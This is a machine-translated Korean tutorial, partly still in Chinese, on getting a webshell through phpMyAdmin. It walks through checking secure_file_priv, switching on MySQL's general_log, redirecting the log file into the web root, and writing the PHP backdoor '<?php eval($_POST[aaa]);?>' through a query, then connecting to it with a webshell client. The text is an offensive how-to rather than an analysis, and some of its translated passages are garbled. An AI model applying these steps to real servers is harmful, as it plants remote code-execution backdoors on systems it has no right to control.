아래 phpmyadmin 사용법 튜토리얼 칼럼에서 새로운 phpmyadmin 자세 getshell을 소개하겠습니다. 필요한 친구들에게 도움이 되길 바랍니다!
Baidu 백과사전: phpMyAdmin은 PHP를 기반으로 하고 웹 사이트 호스트에서 웹 기반 모드로 구조화된 MySQL 데이터베이스 관리 도구로, 관리자가 웹 인터페이스를 사용하여 MySQL 데이터베이스를 관리할 수 있습니다. 이 웹 인터페이스는 특히 대량의 데이터를 가져오고 내보낼 때 복잡한 SQL 구문을 간단한 방법으로 입력하는 더 나은 방법이 될 수 있습니다. 가장 큰 장점 중 하나는 phpMyAdmin이 다른 PHP 프로그램과 마찬가지로 웹 서버에서 실행되지만 이러한 프로그램에서 생성된 HTML 페이지를 어디서나 사용할 수 있다는 것, 즉 MySQL 데이터베이스를 원격으로 관리하고 쉽게 생성, 수정, 삭제할 수 있다는 것입니다. 데이터베이스 및 데이터 테이블. 또한 phpMyAdmin을 사용하면 일반적으로 사용되는 PHP 구문을 생성하여 웹 페이지를 작성할 때 필요한 SQL 구문의 정확성을 높일 수 있습니다.
일반인 입장에서 말하면 웹페이지에서 데이터베이스를 편리하게 운영하는 기능입니다.
사이트의 phpmyadmin 페이지를 받으면 다음으로 해야 할 일은 getshell입니다.
셸을 작성하여 권한을 높일 수 있으며 다음 조건을 충족해야 합니다.
1. 데이터베이스 루트 권한
2. 웹사이트의 물리적 경로를 알아야 합니다.
3. 데이터베이스에 쓰기 권한이 있습니다. select '64d8a9f9d2660d1aa18735456c689d78' INTO OUTFILE '웹사이트 물리적 경로' 쉘에 쓰기
이 기사에서는 주로 조건 3이 충족되지 않을 때 성공적인 getshell에 대해 설명합니다.
사용 조건 :
MySQL 5.0+MySQL 5.0+
버전에서는 자동으로 로그 파일이 생성되므로 서비스 실행 중에 전역 변수를 수정하여 파일 위치를 변경할 수 있으나, 로그가 저장되는 디렉터리를 설정해야 합니다. 생성되었습니다. 읽기 및 쓰기 권한이 있습니다.
(Linux 환경은 더 까다로울 수 있습니다. 사이트 디렉토리는 한 명의 사용자이고 MySQL은 또 다른 사용자이고 권한 제어는 더 엄격하며 주로 권한이 올바르게 구성되었는지 여부에 따라 다릅니다.)먼저 사이트에 쓰기가 있는지 테스트합니다. 허가
SQL 문 실행 SHOW VARIABLES LIKE 'secure_file_priv'
sql 문 SHOW VARIABLES LIKE 'secure_file_priv' 쿼리를 수행하여 secure_file_priv
secure-file-priv 기능을 찾으세요
secure-file-priv 매개변수는 LOAD DATA를 제한하는 데 사용되며 SELECT ... OUTFILE 및 LOAD_FILE()이 지정된 디렉터리로 전달됩니다.
테스트 후 쓰기 권한이 없습니다
그럼 MySQL 전역 변수 2개(
general_log, General_log 파일)를 소개하겠습니다.
SQL 문 SHOW VARIABLES LIKE 'general_log%'를 실행하여 퍼지 쿼리를 수행합니다
로그는 기본적으로 닫혀 있습니다
SQL 문을 실행합니다
set global general_log = "ON"; #开启日志 SET global general_log_file='网站下物理路径'; #更换日志路径
성공적으로 생성되었습니다
然后执行特殊的查询语句
select '<?php eval($_POST[aaa]);?>'
我们进入112233.php进行验证,成功写入shell
最后进行菜刀连接,获得站点webshell
위 내용은 phpmyadmin의 새로운 자세 getshell 정보의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!